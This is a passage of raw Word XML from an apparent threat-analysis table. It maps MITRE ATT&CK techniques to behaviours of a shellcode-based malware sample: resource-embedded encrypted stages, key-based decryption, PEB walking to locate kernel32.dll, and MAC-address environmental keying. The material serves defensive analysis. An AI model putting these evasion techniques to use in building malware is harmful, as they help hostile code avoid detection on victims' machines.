              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="899" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C3FB2BF" w14:textId="5F65E3CC" w:rsidR="004F11AC" w:rsidRDefault="00E623C4" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2839" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62B92ED6" w14:textId="4EAE95F1" w:rsidR="004F11AC" w:rsidRDefault="00E623C4" w:rsidP="00E20C37">
            <w:r>
              <w:t>[5] T</w:t>
            </w:r>
            <w:r w:rsidRPr="00E623C4">
              <w:t>he hackers added an additional encrypted stage of shellcode which resides in the resource section</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B04459" w:rsidRPr="00B04459" w14:paraId="389FC241" w14:textId="77777777" w:rsidTr="00497095">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7175D30F" w14:textId="3179C84F" w:rsidR="00EA7068" w:rsidRPr="00B04459" w:rsidRDefault="004640D3" w:rsidP="009D75D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B04459">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="502ED32B" w14:textId="2351412F" w:rsidR="00EA7068" w:rsidRPr="00B04459" w:rsidRDefault="004640D3" w:rsidP="009D75D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B04459">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B04459">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B04459">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B04459">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B04459">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F68080A" w14:textId="5AC0E0A5" w:rsidR="00EA7068" w:rsidRPr="00B04459" w:rsidRDefault="004640D3" w:rsidP="009D75D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B04459">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B04459">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1140 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B04459">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B04459">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B04459">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4509454B" w14:textId="347713B3" w:rsidR="00EA7068" w:rsidRPr="00B04459" w:rsidRDefault="004640D3" w:rsidP="009D75D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B04459">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FB42A09" w14:textId="77777777" w:rsidR="00EA7068" w:rsidRPr="00B04459" w:rsidRDefault="00EA7068" w:rsidP="009D75D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DBD624E" w14:textId="28065B50" w:rsidR="00EA7068" w:rsidRPr="00B04459" w:rsidRDefault="004640D3" w:rsidP="009D75D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B04459">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="899" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3571054E" w14:textId="78523B5A" w:rsidR="00EA7068" w:rsidRPr="00B04459" w:rsidRDefault="00C1675A" w:rsidP="009D75D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B04459">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2839" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BE5594D" w14:textId="3BEF239B" w:rsidR="00EA7068" w:rsidRPr="00B04459" w:rsidRDefault="004640D3" w:rsidP="009D75D8">
            <w:r w:rsidRPr="00B04459">
              <w:t>[5] The function then uses the first 16 bytes as a key to decrypt the rest of the shellcode.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E623C4" w:rsidRPr="00B857D7" w14:paraId="48E62D24" w14:textId="77777777" w:rsidTr="00497095">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DA02ADC" w14:textId="14589BA9" w:rsidR="00E623C4" w:rsidRDefault="00C1675A" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="149911F7" w14:textId="6EEA2A7C" w:rsidR="00E623C4" w:rsidRPr="00B857D7" w:rsidRDefault="00C1675A" w:rsidP="00E20C37">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677" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F52F49D" w14:textId="3132F97C" w:rsidR="00E623C4" w:rsidRPr="00D81EFA" w:rsidRDefault="00C1675A" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C1675A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C1675A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C7F1A9B" w14:textId="286CD2E8" w:rsidR="00E623C4" w:rsidRDefault="00C1675A" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="732C718A" w14:textId="77777777" w:rsidR="00E623C4" w:rsidRPr="00B857D7" w:rsidRDefault="00E623C4" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B0CB50B" w14:textId="71E3CB7F" w:rsidR="00E623C4" w:rsidRDefault="00C1675A" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="899" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="018A2EDB" w14:textId="1B798375" w:rsidR="00E623C4" w:rsidRDefault="00EA7068" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2839" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D344274" w14:textId="76152AB9" w:rsidR="00E623C4" w:rsidRDefault="00B04459" w:rsidP="00E20C37">
            <w:r>
              <w:t xml:space="preserve">[5] </w:t>
            </w:r>
            <w:r w:rsidRPr="00B04459">
              <w:t xml:space="preserve">The stage 2 shellcode starts by extracting all the required functions from memory while iterating over the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B04459">
              <w:t>InitializationOrderModuleList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B04459">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B04459">
              <w:lastRenderedPageBreak/>
              <w:t>as part of the PEB</w:t>
            </w:r>
            <w:r w:rsidR="00AE0635">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B04459">
              <w:t>and looking for the kernel32.dll module based on specific characters in the module name.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E1DB2" w:rsidRPr="00B857D7" w14:paraId="6963C38A" w14:textId="77777777" w:rsidTr="00497095">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="346D9DC0" w14:textId="33518051" w:rsidR="008E1DB2" w:rsidRDefault="008E1DB2" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C499A80" w14:textId="159E91A2" w:rsidR="008E1DB2" w:rsidRPr="006A7E42" w:rsidRDefault="008E1DB2" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C730F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008C730F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008C730F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008C730F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008C730F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EB912D7" w14:textId="3756455A" w:rsidR="008E1DB2" w:rsidRPr="006A7E42" w:rsidRDefault="008E1DB2" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008E1DB2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1480.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008E1DB2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Execution Guardrails&gt;:Environmental Keying</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D14A322" w14:textId="0EB3DE5C" w:rsidR="008E1DB2" w:rsidRDefault="008E1DB2" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BC3582C" w14:textId="77777777" w:rsidR="008E1DB2" w:rsidRPr="00B857D7" w:rsidRDefault="008E1DB2" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="301A5D89" w14:textId="2DCD19D8" w:rsidR="008E1DB2" w:rsidRDefault="008E1DB2" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="899" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E832A88" w14:textId="5C8B067F" w:rsidR="008E1DB2" w:rsidRDefault="008E1DB2" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2839" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0903947A" w14:textId="116176CF" w:rsidR="008E1DB2" w:rsidRDefault="002263D4" w:rsidP="00E20C37">
            <w:r>
              <w:t>[5] Only runs if MAC addresses as per below</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B04459" w:rsidRPr="00B857D7" w14:paraId="1D67B717" w14:textId="77777777" w:rsidTr="00497095">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6806CCD4" w14:textId="475CBC12" w:rsidR="00B04459" w:rsidRDefault="008E1DB2" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67ECC9FD" w14:textId="10E69DAA" w:rsidR="00B04459" w:rsidRPr="00B857D7" w:rsidRDefault="006A7E42" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006A7E42">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006A7E42">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0007 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006A7E42">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="020DDB1C" w14:textId="1798B81B" w:rsidR="00B04459" w:rsidRPr="00D81EFA" w:rsidRDefault="006A7E42" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006A7E42">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006A7E42">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1016 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006A7E42">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> System Network Configuration Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="689B7FBC" w14:textId="5CC2874A" w:rsidR="00B04459" w:rsidRDefault="008E1DB2" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="308042D7" w14:textId="77777777" w:rsidR="00B04459" w:rsidRPr="00B857D7" w:rsidRDefault="00B04459" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43910008" w14:textId="7A3B3D93" w:rsidR="00B04459" w:rsidRDefault="006A7E42" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="899" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CBB0926" w14:textId="1C8856CB" w:rsidR="00B04459" w:rsidRDefault="006A7E42" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2839" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E5AD345" w14:textId="2A76A52E" w:rsidR="00B04459" w:rsidRDefault="006A7E42" w:rsidP="00E20C37">
            <w:r>
              <w:t xml:space="preserve">[5] </w:t>
            </w:r>
            <w:r w:rsidRPr="006A7E42">
              <w:t xml:space="preserve">As discussed in the previous section, the shellcode iterates over all the MAC addresses, including the NIC and the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006A7E42">
              <w:t>WiFi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006A7E42">
              <w:t xml:space="preserve"> on the machine, and then it collects the encoded MD5s of those MAC addresses.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497095" w:rsidRPr="00B857D7" w14:paraId="778DDA7E" w14:textId="77777777" w:rsidTr="00497095">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3749DCCF" w14:textId="10B245CD" w:rsidR="00497095" w:rsidRDefault="00497095" w:rsidP="00497095">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27A8CF29" w14:textId="42D5144D" w:rsidR="00497095" w:rsidRPr="00B857D7" w:rsidRDefault="00497095" w:rsidP="00497095">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007366F4">
              <w:rPr>
